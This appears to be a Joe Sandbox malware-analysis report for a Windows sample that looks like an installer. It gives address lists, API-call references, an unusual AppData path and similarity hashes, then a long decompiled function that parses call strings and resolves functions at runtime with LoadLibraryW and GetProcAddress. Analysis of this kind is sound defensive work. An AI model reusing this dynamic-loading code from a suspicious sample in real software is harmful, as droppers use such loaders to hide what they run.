0x00404998
0x0040499b
0x00404a09
0x00404a10
0x00404ae7
0x00404aee
0x00404afd
0x00404afd
0x00404b01
0x00404b0b
0x00404b18
0x00404b1a
0x00404b1a
0x00404b28
0x00404b2f
0x00404b36
0x00404b39
0x00404b75
0x00404b77
0x00404b7d
0x00404b82
0x00404b86
0x00404b88
0x00404b88
0x00404ba4
0x00000000
0x00404ba6
0x00404ba9
0x00404bb7
0x00404bbd
0x00404bbe
0x00404bc1
0x00404bc4
0x00000000
0x00404bc4
0x00404b3b
0x00404b3d
0x00404b41
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b43
0x00404b43
0x00404b50
0x00404b55
0x00000000
0x00000000
0x00404b59
0x00404b5b
0x00404b5b
0x00404b64
0x00404b66
0x00404b6b
0x00404b6e
0x00404b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b73
0x00404bd0
0x00404bda
0x00404bdd
0x00404be0
0x00404be7
0x00404be7
0x00404be9
0x00404be9
0x00404bee
0x00404bf0
0x00404bf8
0x00404bff
0x00404c01
0x00404c0c
0x00404c0c
0x00404c01
0x00404c1c
0x00404c26
0x00404c2e
0x00404c49
0x00404c30
0x00404c39
0x00404c39
0x00404c2e
0x00404c4e
0x00404c53
0x00404c58
0x00404c61
0x00404c61
0x00404c6a
0x00404c6c
0x00404c6c
0x00404c78
0x00404c80
0x00404c8a
0x00404c8a
0x00404c8f
0x00000000
0x00404c8f
0x00404b39
0x00404af0
0x00404af7
0x00000000
0x00000000
0x00000000
0x00404af7
0x00404a16
0x00404a1f
0x00404a39
0x00404a3e
0x00404a48
0x00404a4f
0x00404a5b
0x00404a5e
0x00404a61
0x00404a68
0x00404a70
0x00404a73
0x00404a77
0x00404a7e
0x00404a86
0x00404ae0
0x00404a88
0x00404a89
0x00404a90
0x00404a9a
0x00404aa2
0x00404aaf
0x00404ac3
0x00404ac7
0x00404ac7
0x00404ac3
0x00404acc
0x00404ad9
0x00404ad9
0x00404a86
0x00000000
0x00404a3e
0x00404a2c
0x00000000
0x00000000
0x00404a32
0x00000000
0x0040499d
0x004049aa
0x004049b3
0x004049c0
0x004049c0
0x004049c7
0x004049cd
0x004049d6
0x004049d9
0x004049dc
0x004049e4
0x004049e7
0x004049ea
0x004049f0
0x004049f7
0x004049fe
0x00404c95
0x00404ca7
0x00404a04
0x00404a07
0x00000000
0x00404a07
0x004049fe

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,Call), ref: 00404AC7
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,770F3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,770F3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,770F3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially, xrefs: 00404AA4
Call, xrefs: 00404AB5, 00404ABA, 00404AC5
A, xrefs: 00404A77

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially$Call
API String ID: 2624150263-2044661603
Opcode ID: 1c5a3ed0ee9c710774ec2d8b2a9b1df20d62e7de402cc8ac4ccff064f1b89d12
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 1c5a3ed0ee9c710774ec2d8b2a9b1df20d62e7de402cc8ac4ccff064f1b89d12
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 6E551BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6E551BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E6E5512BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E6E5512BB();
				_t321 = E6E5512E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E6E5513B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E6E55162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x6e5523e8) & 0x000000ff) * 4 +  &M6E55235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E6E5512CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E6E5512BB();
											 &_v12 = E6E551B86( &_v12);
											__eax = E6E551510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6E551B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6E551B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6e55405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6E551B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E6E5516BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E6E5513B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E6E5516BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E6E5513B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E6E5513B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E6E5513B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E6E5512CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E6E5513B1(_t90) * 4);
					goto L165;
				}
			}

0x6e551c07
0x6e551c0a
0x6e551c0d
0x6e551c10
0x6e551c13
0x6e551c16
0x6e551c19
0x6e551c1b
0x6e551c1e
0x6e551c21
0x6e551c26
0x6e551c29
0x6e551c31
0x6e551c39
0x6e551c3b
0x6e551c3e
0x6e551c46
0x6e551c46
0x6e551c4b
0x6e551c4e
0x00000000
0x00000000
0x6e551c5b
0x6e551c60
0x6e551c62
0x6e551cf4
0x6e551cf4
0x6e551cf4
0x6e551cf8
0x6e551cfb
0x6e551cfd
0x6e551d1f
0x6e551d21
0x6e551d24
0x6e551d33
0x6e551d35
0x6e551d3b
0x6e551d3b
0x6e551d41
0x6e551d44
0x6e551d44
0x6e551d47
0x6e551d47
0x6e551d4d
0x6e551d4f
0x6e551d4f
0x6e551d51
0x6e551d54
0x6e551d57
0x6e551d5d
0x6e551d63
0x6e551d66
0x6e551d8a
0x6e551d8d
0x00000000
0x00000000
0x6e551d90
0x6e551d92
0x6e551da0
0x6e551da3
0x6e551da5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e551da7
0x6e551da7
0x6e551da7
0x6e551dad
0x6e551daf
0x00000000
0x00000000
0x6e551db1
0x6e551db3
0x6e551db5
0x6e551db7
0x00000000
0x00000000
0x00000000
0x6e551db7
0x6e551db9
0x6e551dbb
0x6e551dbd
0x6e551dbd
0x6e551dc3
0x6e551dc9
0x6e551dcb
0x6e551ddf
0x6e551ddf
0x6e551de1
0x6e551dcd
0x6e551dd3
0x6e551dd6
0x6e551dd6
0x00000000
0x6e551d68
0x6e551d68
0x6e551d68
0x6e551d69
0x6e551d71
0x6e551d75
0x6e551d7b
0x6e551d7f
0x00000000
0x6e551d7f
0x6e551d6b
0x6e551d6b
0x6e551d6c
0x00000000
0x00000000
0x6e551d6e
0x6e551d6f
0x00000000
0x00000000
0x00000000
0x6e551d6f
0x6e551cff
0x6e551d00
0x6e551d09
0x6e551d0c
0x6e551d19
0x6e551d19
0x6e551d0e
0x6e551d0e
0x6e551de7
0x6e551dea
0x6e551dee
0x6e551e61
0x6e551e65
0x6e551c43
0x00000000
0x6e551c43
0x00000000
0x6e551e65
0x6e551cfd
0x6e551c68
0x6e551c6b
0x6e551cce
0x6e551cd1
0x6e551ce3
0x6e551ce3
0x6e551ce6
0x6e551df3
0x6e551df6
0x6e551df6
0x6e551df8
0x6e5521ae
0x6e5521c6
0x6e5521c6
0x6e5521c9
0x00000000
0x00000000
0x6e5521b3
0x6e5521b4
0x6e5521b7
0x6e5521ba
0x6e552244
0x6e55224b
0x6e552251
0x6e552255
0x6e551e5c
0x6e551e5d
0x6e551e5d
0x6e551e5e
0x00000000
0x6e551e5e
0x6e5521c0
0x6e5521c3
0x6e5521c3
0x6e5521cb
0x6e5521ce
0x6e552238
0x6e551e51
0x6e551e54
0x6e551e57
0x6e551e5a
0x6e551e5a
0x00000000
0x6e551e5a
0x6e5521d0
0x6e5521d3
0x6e5521da
0x6e5521da
0x6e5521dd
0x6e5521e1
0x6e5521f5
0x6e5521f5
0x6e5521f8
0x6e5521fc
0x00000000
0x00000000
0x6e5521fe
0x6e552202
0x00000000
0x00000000
0x6e552204
0x6e55220b
0x6e55220b
0x6e552211
0x6e552214
0x6e552230
0x6e552216
0x6e55221f
0x6e552222
0x6e552222
0x00000000
0x6e552214
0x6e5521e3
0x6e5521e6
0x6e5521ea
0x00000000
0x00000000
0x6e5521ec
0x00000000
0x6e5521ec
0x6e5521d5
0x6e5521d8
0x00000000
0x00000000
0x00000000
0x6e5521d8
0x6e551dfe
0x6e551dfe
0x6e551dff
0x6e551f49
0x6e551f49
0x6e551f50
0x6e551f53
0x00000000
0x00000000
0x6e551f60
0x00000000
0x6e55214b
0x6e55214e
0x6e552151
0x6e552151
0x6e552152
0x6e552153
0x6e552156
0x6e552159
0x6e55215c
0x00000000
0x00000000
0x6e55215e
0x6e55215e
0x6e552162
0x6e55217a
0x6e55217d
0x6e552181
0x6e552187
0x00000000
0x6e552187
0x6e552164
0x6e552164
0x6e552167
0x00000000
0x00000000
0x6e552169
0x6e55216c
0x6e55216e
0x6e55216f
0x6e55216f
0x6e55216f
0x6e552170
0x6e552173
0x6e552176
0x6e552177
0x6e552151
0x6e552152
0x6e552153
0x6e552156
0x6e552159
0x6e55215c
0x00000000
0x00000000
0x00000000
0x6e55215c
0x00000000
0x6e551fa7
0x00000000
0x00000000
0x6e551fb3
0x00000000
0x00000000
0x6e551f9a
0x6e551f9e
0x6e551fa2
0x00000000
0x00000000
0x6e55211c
0x6e552120
0x00000000
0x00000000
0x6e552126
0x6e55212f
0x6e552136
0x6e55213e
0x00000000
0x00000000
0x6e552083
0x6e552083
0x00000000
0x00000000
0x6e551fbc
0x00000000
0x00000000
0x6e5521a6
0x00000000
0x00000000
0x6e55208b
0x6e55208d
0x6e55208d
